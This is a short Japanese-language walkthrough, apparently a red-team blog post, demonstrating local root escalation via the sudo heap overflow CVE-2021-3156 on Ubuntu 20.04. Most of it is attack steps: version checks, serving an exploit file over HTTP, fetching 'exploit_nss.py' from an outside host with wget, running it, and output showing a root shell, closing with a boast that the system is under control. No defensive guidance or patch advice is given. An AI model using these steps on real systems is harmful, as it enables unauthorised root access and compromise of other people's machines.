
CVE-2021-3156-エクスプロイト-デモ
📅 日付: 2025-06-08
✍️ 著者: @TopskiyPavelQwertyGang
🧠 セキュリティ研究者 | レッドチーム愛好家
sudoedit (sudo)sudoedit におけるヒープオーバーフローにより、ローカルユーザーが事前に準備されたパラメータで sudoedit コマンドを実行することで root アクセスを取得できる可能性があります。
この脆弱性は、sudo < 1.9.5p2 のバージョンで悪用可能であり、Ubuntu/Debian/CentOS の一般的なイメージが含まれます。
ASLR が有効な場合でも、この脆弱性は悪用可能なままです。
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (脆弱)
ASLR : 2 (有効)
glibc と sudo のバージョンを確認:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
CVE-2021-3156 の悪用は、ASLR が有効であっても、glibc ≥ 2.26 かつ sudo が脆弱なバージョンであれば可能です。
最も安定したエクスプロイトは exploit_nss.py であり、NSS 設定が正しければ初回で成功します。
🧨 システムは制御下にあります。